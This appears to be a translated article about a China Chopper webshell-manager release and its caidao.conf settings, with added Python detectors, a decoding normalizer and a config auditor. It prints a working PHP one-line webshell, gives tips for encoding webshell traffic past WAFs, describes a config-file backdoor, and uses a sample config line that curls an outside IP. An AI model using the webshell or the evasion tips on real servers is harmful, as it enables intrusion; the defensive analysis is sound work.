The coolest chopper ever.

Source: Internet
Author: User

On June 17, a well-known researcher posted this in WeChat Moments:

The most awesome Chinese Chopper is about to be released: it gets past every WAF on the market and takes webshell play to a jaw-dropping level.

Word was that a new version of Chopper would be released at the end of June.

Sure enough, on June 20 the previously closed maicaidao.com came back online, and the download count jumped to 660+ almost instantly.

Without further ado, let's download it and see how great it is.

By the time this article was published the site had gone down again; the exact reason is unknown. (Pulse editor's note: probably a DDoS.)

The Pulse editor checked the Whois changes and believes this is still the work of the original author. Related reading: "Red version of Chinese Chopper (20141213) officially released", "Chinese Chopper counterfeit official website: 3 million boxes burst".

Note: The only official website of Chopper is www.maicaidao.com

After downloading, unzip; the password is www.maicaidao.com

For the specific information sources, see the extracted Readme.txt.

Document description

Caidao.exe: Chopper program
Db.mdb: Chopper master database
caidao.conf: configuration file (important, do not delete)
CACHE.TMP: Chopper cache database (can be deleted)
Readme.txt: description document (can be deleted)
Ip.dat: IP library used for IP address lookup (can be deleted)
CCC: directory for Chopper's own scripts (can be deleted)
Server side of Customize mode (can be deleted)

We can see that the main addition in the new version is caidao.conf, a configuration file that the author himself rates as "important, do not delete". I think this seemingly small change is enough on its own to bring Chinese Chopper back from the dead and let it get past WAFs in seconds.

We know that Chopper's source code is not public, and since updates stopped every WAF on the market has dissected its packets inside and out. Back then, the usual ways to get Chopper past a WAF were:

1. Bypass the WAF with the one-line webshell itself: mutate or obfuscate the one-liner so it escapes the check (then came the WAFs that analyze the request).

2. Decompile the client and modify the packet signatures. This is expensive: you have to reverse the binary, and then there is the awkward problem that the places you can actually change are very limited.

3. Use a relay script to rewrite the packets. This is probably the most common and convenient way to get Chopper past a WAF, but you have to run a relay web service, which is awkward all over again.

Because of all this inconvenience, and because Chopper itself is not cross-platform, open-source webshell management tools have appeared in recent years. Typical examples are AntSword (Chinese Ant Sword), developed by a fellow researcher in Node.js and ES6, cross-platform and open source; Altman, written in C++, cross-platform, with its source also open on GitHub; and Cknife, an open-source webshell manager written in Java. There is quite a lot of software of this kind.

All right, let's take a look at caidao.conf.

caidao.conf

First, to be clear: the premise for Chopper getting past a WAF is that you change these settings; otherwise all you have is a rusty kitchen knife.

1. <FLAG>

The delimiter for returned content, limited to three characters. We know the original delimiters were ->| and |<-; some WAFs intercept these characters, so an obscure sequence such as ~>$ can be used instead.

2. <UA>

Customizes the User-Agent of the HTTP request. The default caidao.conf sets the UA to that of Baidu Spider; you can of course change it to Google's. Occasionally this needs changing, but in most cases the parameter is left alone.

3. <K1> and <K2>

The POST parameter names; by default K1 is z1 and K2 is z2. WAFs generally don't block these, so there is no need to change them.

4. <PHP_BASE>, <ASP_BASE>, <ASPX_BASE>, <PHP_BASE.encryption example>

These four are the base code of the webshell; all function code is assembled here and then sent to the server.

If your server-side webshell does a layer of decoding first, for example the server-side code looks like this:

<?php @eval(base64_decode($_POST['caidao'])); ?>

then you can change the configuration to:

<PHP_BASE.encryption example>eval(base64_decode($_POST[id]));&id=%s</PHP_BASE.encryption example>

Responsibly speaking, this is where most WAFs do their work to catch Chopper. The base is essentially a handful of function code, and a WAF generally won't block it; if it dared to, it would be saying that its customers' business doesn't need that kind of operation.

This is where it gets interesting. Think about it: the old Chopper only had base64_decode, but now you can change it however you like. For example, use hex; or a Caesar cipher or a rail-fence cipher; go further and use AES or DES; the most outrageous option is to write your own encryption and decryption algorithm. That is awkward for a WAF to stop. (This is probably what the author means by "over the WAF".)

5. <GETBASEINFO>

Function code that fetches basic information. For example, when you add a shell and go straight into the virtual terminal, it shows the current path, current user, system type and so on.

6. <SHOWFOLDER>

Function code for listing a directory. The user passes in a path, and all directories and files under it are displayed along with attributes such as file time, permissions and type.

7. <SHOWTXTFILE>

Views the contents of a file; editing a file also calls this first.

8. <SAVETXTFILE>

Save the file.

9. <DELETEFILE>

Delete the file.

10. <DOWNFILE>

Download a server file to the local machine.

11. <UPLOADFILE>

Upload a file to the server side.

12. <PASTEFILE>

Paste a file.

13. <NEWFOLDER>

Create a new directory.

14. <WGET>

Download a file from a remote host to the server.

15. <SHELL>

Execute a system command. This is the awkward part: the relevant functions get blocked, so basically it doesn't work.

The rest is database function code, which I really don't want to write up; Baidu Translate will tell you what the tag names mean, so I won't translate them.
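The tags above describe exactly the fields a defender can key on: the ->| and |<- result delimiters, the crawler User-Agent that the default caidao.conf sets, the z1/z2 parameter names, and the eval(base64_decode($_POST[...])) base code. The following is an added example, written for this article and not code from Chopper or its author, that runs those indicators over a constructed request and response. The sample HTTP request, the parameter name "pass" and the exact User-Agent string are assumptions; only the indicators themselves come from the article.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators taken from the article's description of the default caidao.conf.
DEFAULT_FLAGS = ("->|", "|<-")      # default <FLAG> delimiters around the result
DEFAULT_PARAMS = {"z1", "z2"}        # default <K1>/<K2> parameter names
# The <PHP_BASE> shape that WAFs match on: eval/assert of a base64-decoded POST field.
BASE_CODE_RE = re.compile(
    r"@?(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I)


def inspect_request(method: str, headers: dict, body: str) -> list:
    """Return the names of Chopper indicators found in one HTTP request."""
    findings = []
    ua = headers.get("User-Agent", "").lower()
    # Real crawlers fetch pages with GET; a crawler UA on a form POST is out of place.
    if method.upper() == "POST" and ("baiduspider" in ua or "googlebot" in ua):
        findings.append("crawler user-agent on a POST request")
    params = parse_qs(body, keep_blank_values=True)
    if DEFAULT_PARAMS & set(params):
        findings.append("default parameter names z1/z2")
    for name, values in params.items():
        if any(BASE_CODE_RE.search(v) for v in values):
            findings.append("base-code pattern in parameter '%s'" % name)
    return findings


def inspect_response(body: str, flags=DEFAULT_FLAGS) -> bool:
    """True when the body carries a result wrapped in FLAG delimiters.

    Only works for delimiters you know about: a custom <FLAG> such as ~>$ defeats
    this check, which is why the request-side indicators above matter more.
    """
    open_, close = flags
    start = body.find(open_)
    return start != -1 and body.find(close, start + len(open_)) != -1


# Constructed sample traffic (not a real capture).
SAMPLE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (compatible; Baiduspider/2.0)",  # assumed UA string
    "Content-Type": "application/x-www-form-urlencoded",
}
SAMPLE_BODY = urlencode({
    "pass": "@eval(base64_decode($_POST[id]));",  # assumed field name "pass"
    "id": "ZWNobyAnb2snOw==",                      # base64 of: echo 'ok';
    "z1": "L3Zhci93d3cv",                          # base64 of: /var/www/
})
BENIGN_HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0)",
                  "Content-Type": "application/x-www-form-urlencoded"}
BENIGN_BODY = urlencode({"user": "alice", "q": "hello"})


def run_samples() -> dict:
    """Evaluate the constructed samples and return the findings for inspection."""
    return {
        "chopper_request": inspect_request("POST", SAMPLE_HEADERS, SAMPLE_BODY),
        "benign_request": inspect_request("POST", BENIGN_HEADERS, BENIGN_BODY),
        "chopper_response": inspect_response("->|/var/www/html\tuser\tLinux|<-"),
        "benign_response": inspect_response("<html><body>ok</body></html>"),
    }


if __name__ == "__main__":
    for label, result in run_samples().items():
        print(label, result)
```

The three request-side indicators fire together on the constructed Chopper request and not at all on the benign one, while the response check is deliberately limited to known delimiters; this is the practical consequence of the <FLAG> setting the article describes.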

How to get past a WAF

Although I have touched on some WAF points above, I'll still summarize them systematically here (if only to pad the word count).

Here we need to mention some characteristics of WAFs.

1. Regex-based WAFs

This kind of WAF is too easy to get around; you could say you don't even need to change Chopper's configuration. For instance, base64-encode the one-liner, then base64 it again, and you are past it. If it checks your request, just change <PHP_BASE> and you walk past the WAF like crossing a street. The xxx Dog is a WAF of this kind.

2. Hook-based WAFs

For example, in PHP, functions that can execute a string as script code, such as eval, create_function, preg_replace and assert, all go through the scripting layer's compile_string API.

This kind of WAF hooks that API at the lowest level; if any script calls it, the request is killed outright, no explanation. Normal sites generally don't use these features, and if one really does, a whitelist takes care of it. So how do you get past this kind of WAF with a one-liner? You still want to use a one-liner? Unless... you dig up a local code execution vulnerability in PHP itself, and at that point you would just deploy a remote control and forget the one-liner.

So how do you use Chopper against this kind of WAF? The CUSTOM type. A CUSTOM-type webshell can be understood as a "big horse" (a full-featured webshell); Chopper only parses its input and output. The function code then lives directly on the server, so it doesn't go through the compile_string API and works normally. Executing system commands, though, is another matter. Haha, and again, this feature was already supported by the old version of Chopper. D-Shield is a typical WAF of this type.

To sum up, WAFs fall into two categories: one is easy-going, the other goes too far :)
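The regex-based category fails precisely because it matches the raw request value, so a second layer of base64 (or hex, as the article mentions for <PHP_BASE>) hides the base code from it. The following added example, not from the article or any WAF product, shows that weakness and the defensive fix: peel successive base64/hex layers off a parameter value before applying the same signature. The signature regex and the layer limit are assumptions; a custom cipher of the kind the article describes would not be peeled by this, which is the point of the hook-based category.

```python
import base64
import binascii
import re

# Signature a regex-class WAF might apply to the raw value (assumed pattern).
SIGNATURE_RE = re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)

BASE64_CHARS = re.compile(r"[A-Za-z0-9+/]+={0,2}")
HEX_CHARS = re.compile(r"[0-9a-fA-F]+")


def _try_hex(s: str):
    """Decode s as hex, or return None if it is not a plausible hex string."""
    if len(s) < 8 or len(s) % 2 or not HEX_CHARS.fullmatch(s):
        return None
    return bytes.fromhex(s).decode("latin-1")


def _try_base64(s: str):
    """Decode s as base64, or return None if it is not a plausible base64 string."""
    if len(s) < 8 or not BASE64_CHARS.fullmatch(s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def decode_layers(value: str, max_layers: int = 5) -> list:
    """Return the value followed by each successive hex/base64 decoding of it.

    Hex is tried first because an all-hex string is also valid base64 and would
    otherwise be mis-decoded. Decoding stops at the first layer that is neither.
    """
    layers = [value]
    for _ in range(max_layers):
        current = layers[-1].strip()
        nxt = _try_hex(current)
        if nxt is None:
            nxt = _try_base64(current)
        if nxt is None or nxt == current:
            break
        layers.append(nxt)
    return layers


def raw_signature_hit(value: str) -> bool:
    """What a regex-only WAF sees: the signature applied to the raw value."""
    return bool(SIGNATURE_RE.search(value))


def normalized_signature_hit(value: str) -> bool:
    """The hardened check: the signature applied to every decoded layer."""
    return any(SIGNATURE_RE.search(layer) for layer in decode_layers(value))


# Constructed samples built from the base code quoted in the article.
PAYLOAD = "@eval(base64_decode($_POST[id]));"
ONCE = base64.b64encode(PAYLOAD.encode()).decode()     # single base64 layer
TWICE = base64.b64encode(ONCE.encode()).decode()        # the "base64 it again" trick
HEXED = PAYLOAD.encode().hex()                          # hex instead of base64
BENIGN = base64.b64encode(b"hello world").decode()      # harmless encoded value

if __name__ == "__main__":
    for label, value in [("once", ONCE), ("twice", TWICE), ("hex", HEXED), ("benign", BENIGN)]:
        print(label, "raw:", raw_signature_hit(value), "normalized:", normalized_signature_hit(value))
```

Run as-is, the raw check misses every encoded form while the normalized check catches all three malicious ones and leaves the benign value alone. The layer limit keeps the decoder from being used as a CPU sink by an attacker who nests encodings deeply.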

About the Chopper backdoor

Ever since Chopper's backdoor was exposed, most people no longer trust it. It's ugly: black eats black. This is why many people abandoned Chinese Chopper and developed their own webshell management tools.

A researcher has tested the following recent historical versions of Chopper and found no backdoor; their hashes are:

File                  Size (bytes)   MD5
Caidao-20100928.exe   200192         c05d44dbe353525f492208d891b53875
Caidao-20111116.exe   220672         5001ef50c7e869253a7c152a638eab8a
Caidao-20141213.exe   220160         4b4a956b9c7dc734f339fa05e4c2a990

This time Chopper puts all the packet functions into the configuration file, which largely solves the backdoor problem.

Yes, in future, when you want someone's "bypass xxx" Chopper, you won't need to copy the whole program; a configuration file will do.

So the question is: is there really no backdoor?

Obviously not.

We can rule out a backdoor in Chopper's main program, but the configuration file itself can be tampered with.

Let me give an example: I add backdoor code to <WGET>, and when you run wget, the shell's details are sent to my backdoor server.

You will say: who is that stupid? One look and you'd spot it.

Is that really the case?

To be honest, most security practitioners can't write code. Those who ask around for an "xxx-bypass" Chopper can't even manage a simple regex bypass, so how many lines of code do you expect them to understand? Add encoding and obfuscation on top, and the picture is too beautiful to contemplate.

In the old Chopper, adding a backdoor meant reverse engineering and was limited by the space available; now, with the configuration file, adding a backdoor is more convenient and harder to check.
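Because the configuration file now carries the server-side code, reviewing it before use is the check that matters. The following is an added example, not from the article or from Chopper, of a small auditor for a caidao.conf-style file: it parses the <TAG>...</TAG> sections the article lists and flags any tag body that contains a hard-coded host or an outbound network call, treating <WGET> as the only tag that legitimately fetches from a remote host. The exact file syntax, the tag bodies in the sample, and the set of functions flagged are assumptions; the tag names come from the article.

```python
import re

# Assumed syntax: each section is <NAME>body</NAME>, possibly spanning lines.
TAG_RE = re.compile(r"<([A-Za-z0-9_.]+)>(.*?)</\1>", re.S)
# A literal URL or dotted IP inside a tag body; legitimate tags use %s / $_POST placeholders.
HARDCODED_HOST_RE = re.compile(r"https?://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")
# PHP calls that open an outbound connection (assumed list; file_get_contents is excluded
# because the file-viewing tags legitimately use it on local paths).
NETWORK_FUNC_RE = re.compile(
    r"\b(?:fsockopen|pfsockopen|stream_socket_client|curl_init|curl_exec|mail)\s*\(", re.I)
# Per the article, only <WGET> downloads from a remote host.
EXPECTED_NETWORK_TAGS = {"WGET"}


def parse_conf(text: str) -> dict:
    """Map each tag name to its body."""
    return {name: body.strip() for name, body in TAG_RE.findall(text)}


def audit_conf(text: str) -> list:
    """Return a list of findings, each a dict with the tag and the issue."""
    findings = []
    for name, body in parse_conf(text).items():
        for match in HARDCODED_HOST_RE.finditer(body):
            findings.append({"tag": name, "issue": "hard-coded host", "detail": match.group(0)})
        if NETWORK_FUNC_RE.search(body) and name.upper() not in EXPECTED_NETWORK_TAGS:
            findings.append({"tag": name, "issue": "outbound network call outside <WGET>"})
    return findings


# Constructed sample: tag names from the article, bodies are hypothetical PHP one-liners.
SAMPLE_CONF = """
<FLAG>->|</FLAG>
<K1>z1</K1>
<K2>z2</K2>
<PHP_BASE>@eval(base64_decode($_POST[id]));&id=%s</PHP_BASE>
<SHOWTXTFILE>echo file_get_contents($_POST[z1]);</SHOWTXTFILE>
<WGET>file_put_contents($_POST[z2], file_get_contents($_POST[z1]));</WGET>
<GETBASEINFO>echo getcwd();$c=curl_init("http://203.0.113.10/");curl_exec($c);</GETBASEINFO>
"""

if __name__ == "__main__":
    for finding in audit_conf(SAMPLE_CONF):
        print(finding)
```

On the constructed sample the auditor is silent on <SHOWTXTFILE> and <WGET>, whose network-looking calls take their targets from request parameters, and reports <GETBASEINFO> twice: once for the literal 203.0.113.10 URL and once for the curl call that has no business in a "get basic info" tag. A hard-coded host is the one thing a config-file backdoor cannot avoid, which makes it the cheapest check to run before trusting someone else's caidao.conf.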
